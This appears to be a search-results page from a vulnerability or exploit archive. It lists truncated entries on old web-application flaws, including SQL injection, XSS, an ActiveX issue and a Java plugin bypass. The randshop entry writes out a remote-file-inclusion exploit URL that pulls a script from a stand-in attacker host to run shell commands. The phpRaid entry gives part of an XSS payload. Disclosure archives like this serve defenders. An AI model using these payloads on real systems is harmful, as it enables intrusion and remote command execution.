70 matches found
randshop <= 1.1.x (index.php) Remote File Inclusion Vulnerability
Title: randshop <= 1.1.x Remote File Inclusion Vulnerability - URL: http://www.randshop.com/ - Author: Saudi Hackrz - contact: Saudi.UnixatHotmail.com - dork: "software 2004-2005 by randshop" - exploit: http://target/path/index.php?dateiPfad=http://attacker/cmd.txt?&cmd=ls - greatz: SnIpEr.S...
phpRaidXSS.txt
phpRaid "view.php" XSS Vulnerability Script : phpRaid Script Website : http://www.spiffyjr.com/ Version : phpRaid v2.9.5 This Xss Works On phpRaid Exploit ; 1- Http://www.example.com/phpRaid/view.php?alert'Xss%20Vulnerability'; 2-...
mybb111.txt
---------------------------------- Found By: Breeeeh & CrAzY CrAcKeR Site: www.alshmokh.com Email: [email protected] ---------------------------------- $query = $db->query("SELECT * FROM ".TABLE_PREFIX."forums f WHERE 1=1 $forumlist"); $comma = " - "; while($forum = $db->fetch_array($query)) $title .=...
PluggedOut Nexus SQL injection
PluggedOut Nexus SQL injection Nexus is an open source script you can run on your web server to give you a community based website where people can register, search each others interests, and communicate with one another either through a private messaging system, or via chat requests and forums...
OnePlug CMS - servicesdetails.asp?Service_ID SQL Injection
OnePlug CMS - servicesdetails.asp?Service_ID SQL Injection source: https://www.securityfocus.com/bid/16155/info OnePlug CMS is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in SQL...
Libertas Enterprise CMS 3.0 - index.php Cross-Site Scripting
Libertas Enterprise CMS 3.0 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/15950/info Enterprise CMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage...
A-FAQ 1.0 - 'faqDsp.asp?catcode' SQL Injection
source: https://www.securityfocus.com/bid/15741/info A-FAQ is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access ...
PHPYellowTM 5.33 - 'print_me.php?ckey' SQL Injection
source: https://www.securityfocus.com/bid/15700/info phpYellowTM is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise ...
Sun Java Runtime Environment 1.x Java Plugin - JavaScript Security Restriction Bypass
source: https://www.securityfocus.com/bid/11726/info A vulnerability is reported to exist in the access controls of the Java to JavaScript data exchange within web browsers that employ the Sun Java Plug-in. Reports indicate that it is possible for a malicious website that contains JavaScript code...
IBM ACPRunner 1.2.5 - ActiveX Control Dangerous Method
source: https://www.securityfocus.com/bid/10561/info It is reported that the IBM acpRunner ActiveX control contains dangerous methods that may result in a remote compromise of a system on which the ActiveX control is installed. These methods may be accessed by a malicious website and may result i...